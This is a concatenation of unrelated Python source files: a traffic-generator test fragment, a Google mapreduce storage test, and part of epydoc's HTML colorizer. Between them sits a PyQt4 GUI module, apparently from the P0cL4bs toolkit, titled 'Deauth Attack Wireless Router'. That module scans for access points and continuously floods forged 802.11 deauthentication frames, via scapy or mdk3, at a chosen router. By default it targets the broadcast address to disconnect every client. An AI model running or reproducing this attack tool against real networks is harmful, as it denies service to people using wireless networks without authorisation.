self.c.clear_stats(ports = self.tx_port)
# real
pkts = [bytes(Ether(src=tx_src_mac,dst=tx_dst_mac)/IP()/UDP(sport = x)/('x' * 100)) for x in range(500)]
self.c.push_packets(pkts, ports = self.tx_port, ipg_usec = 1e6 / self.pps)
# noise
pkts = [bytes(Ether(src=tx_src_mac,dst=tx_dst_mac)/IP()/TCP(sport = x)/('x' * 100)) for x in range(500)]
self.c.push_packets(pkts, ports = self.tx_port, ipg_usec = 1e6 / self.pps)
# check capture status with timeout
timeout = PassiveTimer(2)
while not timeout.has_expired():
opackets = self.c.get_stats(ports = self.tx_port)[self.tx_port]['opackets']
if (opackets >= 1000):
break
time.sleep(0.1)
# make sure
caps = self.c.get_capture_status()
assert(len(caps) == 2)
assert(caps[tx_capture_id]['count'] == 250)
assert(caps[rx_capture_id]['count'] == 250)
except STLError as e:
assert False , '{0}'.format(e)
finally:
# cleanup if needed
if tx_capture_id:
self.c.stop_capture(tx_capture_id)
if rx_capture_id:
self.c.stop_capture(rx_capture_id)
self.cleanup()
# tests core pinning with latency
def show_cpu_usage (self):
cpu_stats = [x['ports'] for x in self.c.get_util_stats()['cpu']]
print('')
for i, cpu in enumerate(cpu_stats):
cpu = [x for x in cpu if x != -1]
if cpu:
print('core {0}: {1}'.format(i, cpu))
print('')
def get_cpu_usage (self):
cpu_stats = [x['ports'] for x in self.c.get_util_stats()['cpu'] if x['ports'] != [-1, -1]]
return cpu_stats
def test_core_pinning (self):
if self.c.system_info.get('dp_core_count_per_port') < 2:
self.skip('pinning test requires at least 2 cores per interface')
s1 = STLStream(packet = self.pkt, mode = STLTXCont())
self.c.reset([0, 1])
try:
self.c.add_streams(ports = [0, 1], streams = s1)
# split mode
self.c.start(ports = [0, 1], core_mask = STLClient.CORE_MASK_SPLIT)
time.sleep(0.1)
cpu_stats = self.get_cpu_usage()
# make sure all cores operate on both ports
assert all([stat == [0, 1] for stat in cpu_stats])
self.c.stop(ports = [0, 1])
# pin mode
self.c.start(ports = [0, 1], core_mask = STLClient.CORE_MASK_PIN)
time.sleep(0.1)
cpu_stats = self.get_cpu_usage()
# make sure cores were split equally
if ( (len(cpu_stats) % 2) == 0):
assert cpu_stats.count([0, -1]) == cpu_stats.count([-1, 1])
else:
assert abs(cpu_stats.count([0, -1]) - cpu_stats.count([-1, 1])) == 1
self.c.stop(ports = [0, 1])
except STLError as e:
assert False , '{0}'.format(e)
# check pinning with latency
def test_core_pinning_latency (self):
if self.c.system_info.get('dp_core_count_per_port') < 2:
self.skip('pinning test requires at least 2 cores per interface')
s1 = STLStream(packet = self.pkt, mode = STLTXCont())
l1 = STLStream(packet = self.pkt, mode = STLTXCont(), flow_stats = STLFlowLatencyStats(pg_id = 3))
l2 = STLStream(packet = self.pkt, mode = STLTXCont(), flow_stats = STLFlowLatencyStats(pg_id = 4))
self.c.reset([0, 1])
try:
self.c.add_streams(ports = 0, streams = [s1, l1])
self.c.add_streams(ports = 1, streams = [s1, l2])
# split mode
self.c.start(ports = [0, 1], core_mask = STLClient.CORE_MASK_SPLIT)
time.sleep(0.1)
cpu_stats = self.get_cpu_usage()
# make sure all cores operate on both ports
assert all([stat == [0, 1] for stat in cpu_stats])
self.c.stop(ports = [0, 1])
# pin mode
self.c.start(ports = [0, 1], core_mask = STLClient.CORE_MASK_PIN)
time.sleep(0.1)
# for pin mode with latency, core 0 should operate on both ports
cpu_stats = self.get_cpu_usage()
# core 0 should be associated with both
core_0 = cpu_stats.pop(0)
assert (core_0 == [0, 1])
# make sure cores were split equally
if ( (len(cpu_stats) % 2) == 0):
assert cpu_stats.count([0, -1]) == cpu_stats.count([-1, 1])
else:
assert abs(cpu_stats.count([0, -1]) - cpu_stats.count([-1, 1])) == 1
self.c.stop(ports = [0, 1])
except STLError as e:
assert False , '{0}'.format(e)
|
|
#The MIT License (MIT)
#Copyright (c) 2015-2016 mh4x0f P0cL4bs Team
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from subprocess import Popen,PIPE
from scapy.all import *
import threading
from os import popen,system,getuid,path,makedirs
from re import search,compile,match
from Core.Settings import frm_Settings
from Modules.utils import Refactor,ProcessThread,airdump_start,get_network_scan,set_monitor_mode
from multiprocessing import Process
from subprocess import Popen,PIPE,STDOUT,call,check_output
threadloading = {'deauth':[],'mdk3':[]}
class frm_window(QMainWindow):
def __init__(self, parent=None):
super(frm_window, self).__init__(parent)
self.form_widget = frm_deauth(self)
self.setCentralWidget(self.form_widget)
self.setWindowTitle("Deauth Attack Wireless Router")
self.setWindowIcon(QIcon('rsc/icon.ico'))
self.config = frm_Settings()
self.loadtheme(self.config.XmlThemeSelected())
def loadtheme(self,theme):
sshFile=("Core/%s.qss"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
def closeEvent(self, event):
global threadloading
if len(threadloading['deauth']) != 0 or len(threadloading['mdk3']) != 0:
reply = QMessageBox.question(self, 'About Exit', "Are you sure you want to quit?", QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
for i in threadloading['deauth']:
i.terminate()
print("[*] Deuath Thread Terminate")
for i in threadloading['mdk3']:
i.stop(); i.join()
self.deleteLater()
else:
event.ignore()
class frm_deauth(QWidget):
def __init__(self, parent=None):
super(frm_deauth, self).__init__(parent)
self.Main = QVBoxLayout()
self.xmlcheck = frm_Settings()
self.interface = self.xmlcheck.xmlSettings("interface", "monitor_mode", None, False)
self.ApsCaptured = {}
self.pacote = []
self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
self.window_qt()
def select_target(self):
item = self.tables.selectedItems()
if item != []:
self.linetarget.setText(item[2].text())
else:
QMessageBox.critical(self, "Error in row", "No row selected in the table, please scan the network again")
self.linetarget.clear()
def window_qt(self):
self.mForm = QFormLayout()
self.statusbar = QStatusBar()
system = QLabel("Deauthentication::")
self.statusbar.addWidget(system)
self.Controlador = QLabel("")
self.AttackStatus(False)
self.tables = QTableWidget(5,3)
self.tables.setFixedWidth(350)
self.tables.setRowCount(100)
self.tables.setFixedHeight(250)
self.tables.setSelectionBehavior(QAbstractItemView.SelectRows)
self.tables.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.tables.clicked.connect(self.select_target)
self.tables.resizeColumnsToContents()
self.tables.resizeRowsToContents()
self.tables.horizontalHeader().resizeSection(1,120)
self.tables.horizontalHeader().resizeSection(0,60)
self.tables.horizontalHeader().resizeSection(2,158)
self.tables.verticalHeader().setVisible(False)
Headers = []
for n, key in enumerate(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
self.linetarget = QLineEdit(self)
self.input_client = QLineEdit(self)
self.input_client.setText("FF:FF:FF:FF:FF:FF")
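# FF:FF:FF:FF:FF:FF is the broadcast address - deauth frames addressed to it
# target every client associated with the selected AP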
self.btn_enviar = QPushButton("Send Attack", self)
self.btn_enviar.clicked.connect(self.attack_deauth)
self.btn_scan = QPushButton(" Network Scan ", self)
self.btn_scan.clicked.connect(self.SettingsScan)
self.btn_stop = QPushButton("Stop Attack ", self)
self.btn_stop.clicked.connect(self.kill_thread)
self.btn_enviar.setFixedWidth(170)
self.btn_stop.setFixedWidth(170)
self.btn_scan.setFixedWidth(120)
#icons
self.btn_scan.setIcon(QIcon("rsc/network.png"))
self.btn_enviar.setIcon(QIcon("rsc/start.png"))
self.btn_stop.setIcon(QIcon("rsc/Stop.png"))
self.time_scan = QComboBox(self)
self.time_scan.addItem("10s")
self.time_scan.addItem("20s")
self.time_scan.addItem("30s")
self.get_placa = QComboBox(self)
n = Refactor.get_interfaces()['all']
for i,j in enumerate(n):
if search("wlan", j):
self.get_placa.addItem(n[i])
#grid options
self.Grid = QGridLayout()
self.options_scan = self.xmlcheck.xmlSettings("scanner_AP", "select", None, False)
if self.options_scan != "scan_scapy":self.time_scan.setEnabled(False)
self.Grid.addWidget(QLabel("Time:"),0,0)
self.Grid.addWidget(self.time_scan,0,1)
self.Grid.addWidget(self.get_placa,0,2)
self.Grid.addWidget(self.btn_scan,0,3)
self.Grid.addWidget(QLabel("bssid:"),1,0)
self.Grid.addWidget(QLabel(" Client:"),1,2)
self.Grid.addWidget(self.linetarget,1,1)
self.Grid.addWidget(self.input_client,1,3)
self.form0 = QGridLayout()
self.form0.addWidget(self.tables,0,0)
self.mForm.addRow(self.btn_enviar, self.btn_stop)
self.mForm.addRow(self.statusbar)
self.Main.addLayout(self.form0)
self.Main.addLayout(self.Grid)
self.Main.addLayout(self.mForm)
self.setLayout(self.Main)
def scan_devices_airodump(self):
dirpath = "Settings/Dump"
if not path.isdir(dirpath):
makedirs(dirpath)
self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
exit_air = airdump_start(self.interface)
self.fix = False
if exit_air == None:
self.cap = get_network_scan()
if self.cap != None:
for i in self.cap:
i = i.split("||")
if Refactor.check_is_mac(i[2]):
Headers = []
self.data['Channel'].append(i[0])
self.data['Essid'].append(i[1])
self.data['Bssid'].append(i[2])
for n, key in enumerate(self.data.keys()):
Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
self.cap =[]
def kill_thread(self):
global threadloading
for i in threadloading['deauth']:
i.terminate()
for i in threadloading['mdk3']:
i.stop(); i.join()
self.AttackStatus(False)
print("[*] deauth Attack OFF")
def SettingsScan(self):
self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
if self.get_placa.currentText() == "":
QMessageBox.information(self, "Network Adapter", 'Network Adapter Not found try again.')
else:
self.interface = str(set_monitor_mode(self.get_placa.currentText()).setEnable())
self.xmlcheck.xmlSettings("interface", "monitor_mode", self.interface, False)
if self.time_scan.currentText() == "10s":count = 10
elif self.time_scan.currentText() == "20s":count = 20
elif self.time_scan.currentText() == "30s":count = 30
if self.interface != None:
if self.options_scan == "scan_scapy":
self.scapy_scan_AP(self.interface,count)
for i in self.ApsCaptured.keys():
if Refactor.check_is_mac(i):
self.data['Channel'].append(self.ApsCaptured[i][0])
self.data['Essid'].append(self.ApsCaptured[i][1])
self.data['Bssid'].append(i)
Headers = []
for n, key in enumerate(self.data.keys()):
Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
else:
if path.isfile(popen('which airodump-ng').read().split("\n")[0]):
self.thread_airodump = threading.Thread(target=self.scan_devices_airodump)
self.thread_airodump.daemon = True
self.thread_airodump.start()
else:
QMessageBox.information(self,'Error airodump','airodump-ng not installed')
set_monitor_mode(self.get_placa.currentText()).setDisable()
def scapy_scan_AP(self,interface,timeout):
sniff(iface=str(interface), prn =self.Scanner_devices, timeout=timeout)
def Scanner_devices(self,pkt):
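# beacon frames are management frames (type 0) with subtype 8; the third
# Dot11Elt layer is typically the DS Parameter Set whose single info byte is
# the channel number, and pkt.info carries the ESSID (assumes the usual
# beacon element ordering)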
if pkt.type == 0 and pkt.subtype == 8:
self.ApsCaptured[pkt.addr2] = [str(int(ord(pkt[Dot11Elt:3].info))),pkt.info]
def attack_deauth(self):
global threadloading
if self.linetarget.text() == "":
QMessageBox.information(self, "Target Error", "Please, first select Target for attack")
else:
self.bssid = str(self.linetarget.text())
self.deauth_check = self.xmlcheck.xmlSettings("deauth", "select",None,False)
self.args = str(self.xmlcheck.xmlSettings("mdk3","arguments", None, False))
if self.deauth_check == "packets_scapy":
self.AttackStatus(True)
t = Process(target=self.deauth_attacker, args=(self.bssid,str(self.input_client.text())))
print("[*] deauth Attack On:"+self.bssid)
threadloading['deauth'].append(t)
t.daemon = True
t.start()
else:
if path.isfile(popen('which mdk3').read().split("\n")[0]):
self.AttackStatus(True)
t = ProcessThread(("mdk3 %s %s %s"%(self.interface,self.args,self.bssid)).split())
t.name = "mdk3"
threadloading['mdk3'].append(t)
t.start()
else:
QMessageBox.information(self,'Error mdk3','mdk3 not installed')
set_monitor_mode(self.get_placa.currentText()).setDisable()
def AttackStatus(self,bool):
if bool:
self.Controlador.setText("[ON]")
self.Controlador.setStyleSheet("QLabel { color : green; }")
else:
self.Controlador.setText("[OFF]")
self.Controlador.setStyleSheet("QLabel { color : red; }")
self.statusbar.addWidget(self.Controlador)
def deauth_attacker(self,bssid, client):
conf.verb = 0
conf.iface = self.interface
pkts = []
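# two deauthentication frames are crafted below: pkt1 is addressed to the
# client on behalf of the AP (bssid) with reason code 7 ("class 3 frame
# received from non-associated station"), pkt2 goes the opposite way, from
# the client towards the AP; both are flooded until the process is killed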
pkt1 = RadioTap()/Dot11(type=0,
subtype=12,addr1=client,
addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)
pkt2 = Dot11(addr1=bssid, addr2=client,
addr3=client)/Dot11Deauth()
pkts.append(pkt1)
pkts.append(pkt2)
while True:
for i in pkts:
sendp(i,verbose=False,count=1)
@pyqtSlot(QModelIndex)
def list_clicked(self, index):
itms = self.list.selectedIndexes()
for i in itms:
attack = str(i.data().toString()).split()
for i in attack:
if Refactor.check_is_mac(i.replace(" ", "")):
self.linetarget.setText(str(i))
if self.linetarget.text() == "":
QMessageBox.information(self, "MacAddress",
"Error check the Mac Target, please set the mac valid.")
|
|
#!/usr/bin/env python
#
# Copyright 2011 Google Inc. All Rights Reserved.
# Using opensource naming conventions, pylint: disable=g-bad-name
import unittest
from google.appengine.ext import db
from mapreduce import control
from mapreduce import input_readers
from mapreduce import model
from mapreduce import output_writers
from mapreduce import records
from mapreduce import test_support
from testlib import testutil
# pylint: disable=g-import-not-at-top
# TODO(user): Cleanup imports if/when cloudstorage becomes part of runtime.
try:
import cloudstorage
enable_cloudstorage_tests = True
except ImportError:
enable_cloudstorage_tests = False
DATASTORE_READER_NAME = (input_readers.__name__ + "." +
input_readers.DatastoreInputReader.__name__)
class TestEntity(db.Model):
"""Test entity class."""
def test_handler_yield_key_str(entity):
"""Test handler which yields entity key."""
yield str(entity.key()) + "\n"
class GoogleCloudStorageOutputWriterEndToEndTest(testutil.CloudStorageTestBase):
"""End-to-end tests for CloudStorageOutputWriter."""
WRITER_CLS = output_writers._GoogleCloudStorageOutputWriter
WRITER_NAME = output_writers.__name__ + "." + WRITER_CLS.__name__
def _runTest(self, num_shards):
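# writes `entity_count` entities, runs a map job over them with the given
# number of shards and verifies that the writer produced one distinct file
# per shard and that, combined, the files contain one line per entity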
entity_count = 1000
bucket_name = "bucket"
job_name = "test_map"
for _ in range(entity_count):
TestEntity().put()
mapreduce_id = control.start_map(
job_name,
__name__ + ".test_handler_yield_key_str",
DATASTORE_READER_NAME,
{
"entity_kind": __name__ + "." + TestEntity.__name__,
"output_writer": {
"bucket_name": bucket_name,
},
},
shard_count=num_shards,
output_writer_spec=self.WRITER_NAME)
test_support.execute_until_empty(self.taskqueue)
mapreduce_state = model.MapreduceState.get_by_job_id(mapreduce_id)
filenames = self.WRITER_CLS.get_filenames(mapreduce_state)
self.assertEqual(num_shards, len(set(filenames)))
total_entries = 0
for shard in range(num_shards):
self.assertTrue(filenames[shard].startswith("/%s/%s" % (bucket_name,
job_name)))
data = cloudstorage.open(filenames[shard]).read()
# strip() is used to remove the last newline of each file so that split()
# does not return extraneous empty entries.
total_entries += len(data.strip().split("\n"))
self.assertEqual(entity_count, total_entries)
def testSingleShard(self):
self._runTest(num_shards=1)
def testMultipleShards(self):
self._runTest(num_shards=4)
class GCSRecordOutputWriterEndToEndTestBase(object):
WRITER_CLS = output_writers._GoogleCloudStorageRecordOutputWriter
WRITER_NAME = output_writers.__name__ + "." + WRITER_CLS.__name__
def _runTest(self, num_shards):
entity_count = 1000
bucket_name = "bucket"
job_name = "test_map"
for _ in range(entity_count):
TestEntity().put()
mapreduce_id = control.start_map(
job_name,
__name__ + ".test_handler_yield_key_str",
DATASTORE_READER_NAME,
{
"entity_kind": __name__ + "." + TestEntity.__name__,
"output_writer": {
"bucket_name": bucket_name,
},
},
shard_count=num_shards,
output_writer_spec=self.WRITER_NAME)
test_support.execute_until_empty(self.taskqueue)
mapreduce_state = model.MapreduceState.get_by_job_id(mapreduce_id)
filenames = self.WRITER_CLS.get_filenames(mapreduce_state)
self.assertEqual(num_shards, len(set(filenames)))
total_entries = 0
for shard in range(num_shards):
self.assertTrue(filenames[shard].startswith("/%s/%s" % (bucket_name,
job_name)))
data = "".join([_ for _ in records.RecordsReader(
cloudstorage.open(filenames[shard]))])
# strip() is used to remove the last newline of each file so that split()
# does not return extraneous empty entries.
total_entries += len(data.strip().split("\n"))
self.assertEqual(entity_count, total_entries)
def testSingleShard(self):
self._runTest(num_shards=1)
def testMultipleShards(self):
self._runTest(num_shards=4)
class GoogleCloudStorageRecordOutputWriterEndToEndTest(
GCSRecordOutputWriterEndToEndTestBase,
testutil.CloudStorageTestBase):
"""End-to-end tests for CloudStorageRecordOutputWriter."""
WRITER_CLS = output_writers._GoogleCloudStorageRecordOutputWriter
WRITER_NAME = output_writers.__name__ + "." + WRITER_CLS.__name__
class GoogleCloudStorageConsistentRecordOutputWriterEndToEndTest(
GCSRecordOutputWriterEndToEndTestBase,
testutil.CloudStorageTestBase):
"""End-to-end tests for CloudStorageConsistentRecordOutputWriter."""
WRITER_CLS = output_writers.GoogleCloudStorageConsistentRecordOutputWriter
WRITER_NAME = output_writers.__name__ + "." + WRITER_CLS.__name__
class GoogleCloudStorageConsistentOutputWriterEndToEndTest(
testutil.CloudStorageTestBase):
"""End-to-end tests for CloudStorageOutputWriter."""
WRITER_CLS = output_writers.GoogleCloudStorageConsistentOutputWriter
WRITER_NAME = output_writers.__name__ + "." + WRITER_CLS.__name__
def _runTest(self, num_shards):
entity_count = 1000
bucket_name = "bucket"
tmp_bucket_name = "tmp_bucket"
job_name = "test_map"
for _ in range(entity_count):
TestEntity().put()
mapreduce_id = control.start_map(
job_name,
__name__ + ".test_handler_yield_key_str",
DATASTORE_READER_NAME,
{
"entity_kind": __name__ + "." + TestEntity.__name__,
"output_writer": {
"bucket_name": bucket_name,
"tmp_bucket_name": tmp_bucket_name,
},
},
shard_count=num_shards,
output_writer_spec=self.WRITER_NAME)
test_support.execute_until_empty(self.taskqueue)
mapreduce_state = model.MapreduceState.get_by_job_id(mapreduce_id)
filenames = self.WRITER_CLS.get_filenames(mapreduce_state)
self.assertEqual(num_shards, len(set(filenames)))
total_entries = 0
for shard in range(num_shards):
self.assertTrue(filenames[shard].startswith("/%s/%s" % (bucket_name,
job_name)))
data = cloudstorage.open(filenames[shard]).read()
# strip() is used to remove the last newline of each file so that split()
# does not return extraneous empty entries.
total_entries += len(data.strip().split("\n"))
self.assertEqual(entity_count, total_entries)
# no files left in tmpbucket
self.assertFalse(list(cloudstorage.listbucket("/%s" % tmp_bucket_name)))
# and only expected files in regular bucket
files_in_bucket = [
f.filename for f in cloudstorage.listbucket("/%s" % bucket_name)]
self.assertEquals(filenames, files_in_bucket)
def testSingleShard(self):
self._runTest(num_shards=1)
def testMultipleShards(self):
self._runTest(num_shards=4)
if __name__ == "__main__":
unittest.main()
|
|
#
# epydoc.html: HTML colorizers
# Edward Loper
#
# Created [10/16/02 09:49 PM]
# $Id: html_colorize.py 1477 2007-02-13 20:27:31Z edloper $
#
"""
Functions to produce colorized HTML code for various objects.
Currently, C{html_colorize} defines functions to colorize
Python source code.
"""
__docformat__ = 'epytext en'
import re, codecs
from epydoc import log
from epydoc.util import py_src_filename
from epydoc.apidoc import *
import tokenize, token, cgi, keyword
try: from cStringIO import StringIO
except: from StringIO import StringIO
######################################################################
## Python source colorizer
######################################################################
"""
Goals:
- colorize tokens appropriately (using css)
- optionally add line numbers
"""
#: Javascript code for the PythonSourceColorizer
PYSRC_JAVASCRIPTS = '''\
function expand(id) {
var elt = document.getElementById(id+"-expanded");
if (elt) elt.style.display = "block";
var elt = document.getElementById(id+"-expanded-linenums");
if (elt) elt.style.display = "block";
var elt = document.getElementById(id+"-collapsed");
if (elt) { elt.innerHTML = ""; elt.style.display = "none"; }
var elt = document.getElementById(id+"-collapsed-linenums");
if (elt) { elt.innerHTML = ""; elt.style.display = "none"; }
var elt = document.getElementById(id+"-toggle");
if (elt) { elt.innerHTML = "-"; }
}
function collapse(id) {
var elt = document.getElementById(id+"-expanded");
if (elt) elt.style.display = "none";
var elt = document.getElementById(id+"-expanded-linenums");
if (elt) elt.style.display = "none";
var elt = document.getElementById(id+"-collapsed-linenums");
if (elt) { elt.innerHTML = "<br/>"; elt.style.display="block"; }
var elt = document.getElementById(id+"-toggle");
if (elt) { elt.innerHTML = "+"; }
var elt = document.getElementById(id+"-collapsed");
if (elt) {
elt.style.display = "block";
var indent = elt.getAttribute("indent");
var pad = elt.getAttribute("pad");
var s = "<tt class=\'py-lineno\'>";
for (var i=0; i<pad.length; i++) { s += " " }
s += "</tt>";
s += " <tt class=\'py-line\'>";
for (var i=0; i<indent.length; i++) { s += " " }
s += "<a href=\'#\' onclick=\'expand(\\"" + id;
s += "\\");return false\'>...</a></tt><br />";
elt.innerHTML = s;
}
}
function toggle(id) {
elt = document.getElementById(id+"-toggle");
if (elt.innerHTML == "-")
collapse(id);
else
expand(id);
return false;
}
function highlight(id) {
var elt = document.getElementById(id+"-def");
if (elt) elt.className = "py-highlight-hdr";
var elt = document.getElementById(id+"-expanded");
if (elt) elt.className = "py-highlight";
var elt = document.getElementById(id+"-collapsed");
if (elt) elt.className = "py-highlight";
}
function num_lines(s) {
var n = 1;
var pos = s.indexOf("\\n");
while ( pos > 0) {
n += 1;
pos = s.indexOf("\\n", pos+1);
}
return n;
}
// Collapse all blocks that have more than `min_lines` lines.
function collapse_all(min_lines) {
var elts = document.getElementsByTagName("div");
for (var i=0; i<elts.length; i++) {
var elt = elts[i];
var split = elt.id.indexOf("-");
if (split > 0)
if (elt.id.substring(split, elt.id.length) == "-expanded")
if (num_lines(elt.innerHTML) > min_lines)
collapse(elt.id.substring(0, split));
}
}
function expandto(href) {
var start = href.indexOf("#")+1;
if (start != 0 && start != href.length) {
if (href.substring(start, href.length) != "-") {
collapse_all(4);
pos = href.indexOf(".", start);
while (pos != -1) {
var id = href.substring(start, pos);
expand(id);
pos = href.indexOf(".", pos+1);
}
var id = href.substring(start, href.length);
expand(id);
highlight(id);
}
}
}
function kill_doclink(id) {
var parent = document.getElementById(id);
parent.removeChild(parent.childNodes.item(0));
}
function auto_kill_doclink(ev) {
if (!ev) var ev = window.event;
if (!this.contains(ev.toElement)) {
var parent = document.getElementById(this.parentID);
parent.removeChild(parent.childNodes.item(0));
}
}
function doclink(id, name, targets_id) {
var elt = document.getElementById(id);
// If we already opened the box, then destroy it.
// (This case should never occur, but leave it in just in case.)
if (elt.childNodes.length > 1) {
elt.removeChild(elt.childNodes.item(0));
}
else {
// The outer box: relative + inline positioning.
var box1 = document.createElement("div");
box1.style.position = "relative";
box1.style.display = "inline";
box1.style.top = 0;
box1.style.left = 0;
// A shadow for fun
var shadow = document.createElement("div");
shadow.style.position = "absolute";
shadow.style.left = "-1.3em";
shadow.style.top = "-1.3em";
shadow.style.background = "#404040";
// The inner box: absolute positioning.
var box2 = document.createElement("div");
box2.style.position = "relative";
box2.style.border = "1px solid #a0a0a0";
box2.style.left = "-.2em";
box2.style.top = "-.2em";
box2.style.background = "white";
box2.style.padding = ".3em .4em .3em .4em";
box2.style.fontStyle = "normal";
box2.onmouseout=auto_kill_doclink;
box2.parentID = id;
// Get the targets
var targets_elt = document.getElementById(targets_id);
var targets = targets_elt.getAttribute("targets");
var links = "";
target_list = targets.split(",");
for (var i=0; i<target_list.length; i++) {
var target = target_list[i].split("=");
links += "<li><a href=\'" + target[1] +
"\' style=\'text-decoration:none\'>" +
target[0] + "</a></li>";
}
// Put it all together.
elt.insertBefore(box1, elt.childNodes.item(0));
//box1.appendChild(box2);
box1.appendChild(shadow);
shadow.appendChild(box2);
box2.innerHTML =
"Which <b>"+name+"</b> do you want to see documentation for?" +
"<ul style=\'margin-bottom: 0;\'>" +
links +
"<li><a href=\'#\' style=\'text-decoration:none\' " +
"onclick=\'kill_doclink(\\""+id+"\\");return false;\'>"+
"<i>None of the above</i></a></li></ul>";
}
return false;
}
'''
PYSRC_EXPANDTO_JAVASCRIPT = '''\
<script type="text/javascript">
<!--
expandto(location.href);
// -->
</script>
'''
class PythonSourceColorizer:
"""
A class that renders a python module's source code into HTML
pages. These HTML pages are intended to be provided along with
the API documentation for a module, in case a user wants to learn
more about a particular object by examining its source code.
Links are therefore generated from the API documentation to the
source code pages, and from the source code pages back into the
API documentation.
The HTML generated by C{PythonSourceColorizer} has several notable
features:
- CSS styles are used to color tokens according to their type.
(See L{CSS_CLASSES} for a list of the different token types
that are identified).
- Line numbers are included to the left of each line.
- The first line of each class and function definition includes
a link to the API source documentation for that object.
- The first line of each class and function definition includes
an anchor that can be used to link directly to that class or
function.
- If javascript is enabled, and the page is loaded using the
anchor for a class or function (i.e., if the url ends in
C{'#I{<name>}'}), then that class or function will automatically
be highlighted; and all other classes and function definition
blocks will be 'collapsed'. These collapsed blocks can be
expanded by clicking on them.
- Unicode input is supported (including automatic detection
of C{'coding:'} declarations).
"""
#: A look-up table that is used to determine which CSS class
#: should be used to colorize a given token. The following keys
#: may be used:
#: - Any token name (e.g., C{'STRING'})
#: - Any operator token (e.g., C{'='} or C{'@'}).
#: - C{'KEYWORD'} -- Python keywords such as C{'for'} and C{'if'}
#: - C{'DEFNAME'} -- the name of a class or function at the top
#: of its definition statement.
#: - C{'BASECLASS'} -- names of base classes at the top of a class
#: definition statement.
#: - C{'PARAM'} -- function parameters
#: - C{'DOCSTRING'} -- docstrings
#: - C{'DECORATOR'} -- decorator names
#: If no CSS class can be found for a given token, then it won't
#: be marked with any CSS class.
CSS_CLASSES = {
'NUMBER': 'py-number',
'STRING': 'py-string',
'COMMENT': 'py-comment',
'NAME': 'py-name',
'KEYWORD': 'py-keyword',
'DEFNAME': 'py-def-name',
'BASECLASS': 'py-base-class',
'PARAM': 'py-param',
'DOCSTRING': 'py-docstring',
'DECORATOR': 'py-decorator',
'OP': 'py-op',
'@': 'py-decorator',
}
#: HTML code for the beginning of a collapsable function or class
#: definition block. The block contains two <div>...</div>
#: elements -- a collapsed version and an expanded version -- and
#: only one of these elements is visible at any given time. By
#: default, all definition blocks are expanded.
#:
#: This string should be interpolated with the following values::
#: (name, indentation, name)
#: Where C{name} is the anchor name for the function or class; and
#: indentation is a string of whitespace used to indent the
#: ellipsis marker in the collapsed version.
START_DEF_BLOCK = (
'<div id="%s-collapsed" style="display:none;" '
'pad="%s" indent="%s"></div>'
'<div id="%s-expanded">')
#: HTML code for the end of a collapsable function or class
#: definition block.
END_DEF_BLOCK = '</div>'
#: A regular expression used to pick out the unicode encoding for
#: the source file.
UNICODE_CODING_RE = re.compile(r'.*?\n?.*?coding[:=]\s*([-\w.]+)')
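#: For example, it extracts ``utf-8`` from a declaration such as
#: ``# -*- coding: utf-8 -*-`` near the top of the file.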
#: A configuration constant, used to determine whether or not to add
#: collapsable <div> elements for definition blocks.
ADD_DEF_BLOCKS = True
#: A configuration constant, used to determine whether or not to
#: add line numbers.
ADD_LINE_NUMBERS = True
#: A configuration constant, used to determine whether or not to
#: add tooltips for linked names.
ADD_TOOLTIPS = True
#: If true, then try to guess which target is appropriate for
#: linked names; if false, then always open a div asking the
#: user which one they want.
GUESS_LINK_TARGETS = False
def __init__(self, module_filename, module_name,
docindex=None, url_func=None, name_to_docs=None):
"""
Create a new HTML colorizer for the specified module.
@param module_filename: The name of the file containing the
module; its text will be loaded from this file.
@param module_name: The dotted name of the module; this will
be used to create links back into the API source
documentation.
"""
# Get the source version, if possible.
try: module_filename = py_src_filename(module_filename)
except: pass
#: The filename of the module we're colorizing.
self.module_filename = module_filename
#: The dotted name of the module we're colorizing.
self.module_name = module_name
#: A docindex, used to create href links from identifiers to
#: the API documentation for their values.
self.docindex = docindex
#: A mapping from short names to lists of ValueDoc, used to
#: decide which values an identifier might map to when creating
#: href links from identifiers to the API docs for their values.
self.name_to_docs = name_to_docs
#: A function that maps APIDoc -> URL, used to create href
#: links from identifiers to the API documentation for their
#: values.
self.url_func = url_func
#: The index in C{text} of the last character of the last
#: token we've processed.
self.pos = 0
#: A list that maps line numbers to character offsets in
#: C{text}. In particular, line C{M{i}} begins at character
#: C{line_offset[i]} in C{text}. Since line numbers begin at
#: 1, the first element of C{line_offsets} is C{None}.
self.line_offsets = []
#: A list of C{(toktype, toktext)} for all tokens on the
#: logical line that we are currently processing. Once a
#: complete line of tokens has been collected in C{cur_line},
#: it is sent to L{handle_line} for processing.
self.cur_line = []
#: A list of the names of the class or functions that include
#: the current block. C{context} has one element for each
#: level of indentation; C{context[i]} is the name of the class
#: or function defined by the C{i}th level of indentation, or
#: C{None} if that level of indentation doesn't correspond to a
